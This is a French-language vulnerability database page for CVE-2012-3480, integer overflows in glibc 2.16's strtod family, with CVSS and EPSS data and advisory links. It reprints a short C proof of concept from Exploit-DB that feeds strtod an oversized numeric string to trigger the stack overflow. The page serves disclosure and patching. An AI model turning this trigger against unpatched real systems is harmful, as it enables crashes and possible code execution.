CVE-2012-3480 : Détail

CVE-2012-3480

0.09%V3
Local
2012-08-25
08h00 +00:00
2017-06-30
14h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, (4) strtod_l, and other unspecified "related functions" in stdlib in GNU C Library (aka glibc or libc6) 2.16 allow local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long string, which triggers a stack-based buffer overflow.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 37631

Date de publication : 2012-08-12 22h00 +00:00
Auteur : Joseph S. Myer
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/54982/info GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. include <stdio.h> #include <stdlib.h> #include <string.h> #define EXPONENT "e-2147483649" #define SIZE 214748364 int main (void) { char *p = malloc (1 + SIZE + sizeof (EXPONENT)); if (p == NULL) { perror ("malloc"); exit (EXIT_FAILURE); } p[0] = '1'; memset (p + 1, '0', SIZE); memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT)); double d = strtod (p, NULL); printf ("%a\n", d); exit (EXIT_SUCCESS); }

Products Mentioned

Configuraton 0

Gnu>>Glibc >> Version 2.16

Références

http://www.openwall.com/lists/oss-security/2012/08/13/4
Tags : mailing-list, x_refsource_MLIST
http://osvdb.org/84710
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/54982
Tags : vdb-entry, x_refsource_BID
http://www.openwall.com/lists/oss-security/2012/08/13/6
Tags : mailing-list, x_refsource_MLIST
http://rhn.redhat.com/errata/RHSA-2012-1325.html
Tags : vendor-advisory, x_refsource_REDHAT
http://rhn.redhat.com/errata/RHSA-2012-1262.html
Tags : vendor-advisory, x_refsource_REDHAT
https://security.gentoo.org/glsa/201503-04
Tags : vendor-advisory, x_refsource_GENTOO
http://rhn.redhat.com/errata/RHSA-2012-1207.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id?1027374
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ubuntu.com/usn/USN-1589-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/50201
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/50422
Tags : third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2012-1208.html
Tags : vendor-advisory, x_refsource_REDHAT